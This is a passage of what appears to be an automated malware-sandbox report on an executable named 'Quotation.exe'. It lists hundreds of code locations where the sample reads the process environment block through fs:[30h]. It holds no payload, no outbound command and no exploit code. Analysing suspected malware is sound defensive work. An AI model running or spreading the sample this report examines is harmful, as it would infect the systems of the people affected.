        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A2E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335382E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D2EC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537290 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE289 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B2BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352C2B0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF2AE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F92AB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335542AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335542AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335292AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356415F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352A147 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335C314A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3358717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3358717A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33605149 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33536179 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33603157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33603157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33603157 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356716D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F113 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560118 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355510F mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353510D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF13E mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335BA130 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33567128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33567128 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335451C0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335291F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335291F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335401F1 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355F1F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353A1E3 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F81EE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355B1E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335391E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335391E5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335281EB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33559194 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571190 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534180 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336051B6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335631BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335631BE mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335641BB mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335641BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335641BB mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356E1A4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33531051 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560044 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33537072 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33536074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33536074 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360505B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335D9060 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572010 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33555004 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33555004 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33538009 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D02D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354B0D0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B0D6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352C0F6 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356D0F0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356D0F0 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335290F8 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352A093 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352C090 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336050B7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33604080 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EB0AF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335700A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DF0A5 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33552755 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356A750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352F75B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335DE750 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33563740 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356174A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33560774 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534779 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33534779 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33542760 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33571763 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353471B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353471B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF717 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353D700 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F970B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335F970B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352B705 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355270D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33559723 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335EF7CF mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335377F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335377F9 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3355E7E0 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335337E4 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33561796 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33561796 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335AE79D mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_336017BC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B781 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3360B781 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335307A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_335FD7A7 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33565654 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353965A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3353965A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356265C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356265C mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356265C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33533640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3354F640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3356C640 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D64A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_3352D64A mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33530670 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\Quotation.exeCode function: 10_2_33572670 mov eax, dword ptr fs:[00000030h]
